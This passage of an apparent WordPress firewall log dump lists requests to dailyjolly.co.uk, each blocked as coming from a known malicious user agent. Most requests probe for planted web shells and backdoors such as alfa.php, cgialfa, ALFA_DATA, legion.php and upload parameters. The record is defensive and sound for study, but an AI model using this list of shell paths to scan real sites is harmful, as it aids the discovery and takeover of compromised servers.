User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10885,1673863187.268871,1673863187.135100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/xmlrpcs.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3htbHJwY3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10886,1673863183.444264,1673863183.306100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/xmrlpc.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10887,1673863174.788953,1673863174.653700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/old-index.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sZC1pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10888,1673863167.661342,1673863167.498700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10889,1673863146.014758,1673863145.885300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/lock360.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xvY2szNjAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10890,1673863140.471477,1673863140.311900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10891,1673863107.700935,1673863107.578700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10892,1673863104.703006,1673863104.541800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10893,1673863092.933747,1673863092.750900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10894,1673863092.275200,1673863092.127900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10895,1673863081.272908,1673863081.158600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10896,1673863080.951030,1673863080.798400,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10897,1673862807.889557,1673862807.758800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10898,1673862798.279876,1673862798.149600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10899,1673863583.537931,1673863583.423600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10900,1673863583.207601,1673863583.057800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10901,1673863582.844053,1673863582.722400,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(10902,1673863582.517799,1673863582.383200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(10903,1673863582.161830,1673863582.042000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(10904,1673863581.830229,1673863581.713500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10905,1673863581.428959,1673863581.306800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10906,1673863580.837808,1673863580.726200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10907,1673863580.519802,1673863580.371000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(10908,1673863580.170434,1673863580.037300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10909,1673863579.771865,1673863579.652900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10910,1673863579.435412,1673863579.326200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10911,1673863578.441764,1673863578.335500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10912,1673863578.128421,1673863577.969900,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10913,1673863577.756849,1673863577.634700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10914,1673863577.410902,1673863577.297100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(10915,1673863576.929741,1673863576.817500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(10916,1673863576.422864,1673863576.314000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10917,1673863576.086176,1673863575.972800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10918,1673863575.009373,1673863574.890200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10919,1673863574.243226,1673863574.112500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10920,1673863573.869241,1673863573.757000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(10921,1673863572.437769,1673863572.309800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(10922,1673863568.441772,1673863568.298000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(10923,1673863562.718623,1673863562.592700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10924,1673863553.021082,1673863552.909300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10925,1673863551.356255,1673863551.240500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10926,1673863549.297138,1673863549.165600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10927,1673863462.625647,1673863462.504100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/xindex.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10928,1673863445.703048,1673863445.590000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10929,1673863443.467883,1673863443.350600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10930,1673863441.646735,1673863441.520000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10931,1673863421.667163,1673863421.539600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10932,1673863600.267286,1673863600.159800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10933,1673863600.068115,1673863599.959400,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10934,1673863599.918783,1673863599.810100,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10935,1673863599.770232,1673863599.658200,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10936,1673863599.618340,1673863599.504000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 